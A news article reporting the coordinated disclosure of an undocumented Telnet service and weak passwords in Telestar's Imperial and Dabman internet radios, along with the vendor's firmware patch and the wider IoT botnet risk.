Critical vulnerabilities have been discovered in Telestar Digital GmbH Internet of Things (IoT) radio devices that permit attackers to remotely hijack systems.
Several weeks ago, the company found an anomaly on a private server linked to web radio terminals belonging to Telestar devices, alongside an undocumented telnetd server.
The radios in question are from the company's Imperial & Dabman Series I and D product line, which include portable radios and DAB stereos.
These products are sold across Europe, utilize Bluetooth and Internet connectivity, and are based on BusyBox Linux Debian.
An investigation into the radios revealed an undocumented Telnet service on Port 23, and as port forwarding was active, could be addressed externally. The video below shows how a port scan, the nmap tool, and ncrack could be used to infiltrate the system.
The team was able to connect and brute-force the radio within only 10 minutes due to lax password security, granting them root access with full privileges.
"For testing we edited some of the folders, created files, and modified paths to see what we are able to change in the native source of the application," Kunz says. "Finally, we were able to edit and access everything on the box and had the ability to fully compromise the smart web radio device."
Possible attacks included changing device names, forcing a play stream, saving audio files as messages, and to transmit audio as commands both locally and remotely.
On Facebook, the security researcher said over one million devices may be at risk.
While the single compromise of an IoT radio may not seem like a big security issue, the disclosure highlights a problem that impacts all of us -- the enslavement of IoT devices to create larger threats. As an example, Mirai botnet variants specialize in hijacking IoT devices with open ports or weak security -- such as those using default credentials -- in order to launch powerful distributed denial-of-service (DDoS) attacks.
TechRepublic: How to prevent a Corporate Account Takeover
It is also possible to harness these vulnerabilities to spread malware or to deface devices.
Vulnerability-Lab notified Telestar Digital GmbH of its research on June 1. Within a week, the vendor responded to the report and a patch was ready by August 30, leading to the coordinated public disclosure.
The telnetd service is being changed and the lax password use has been revised. Automatic updates via Wi-Fi are now available and can be implemented by setting impacted devices back to factory settings and accepting downloads of the latest firmware version.
Telestar Digital GmbH is not aware of any examples of the vulnerabilities being exploited in the wild.
Previous and related coverage
- HackerOne bug bounty platform closes new $36.4m funding round
- No municipality paid ransoms in 'coordinated ransomware attack' that hit Texas
- Millions of Exim servers vulnerable to root-granting exploit
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0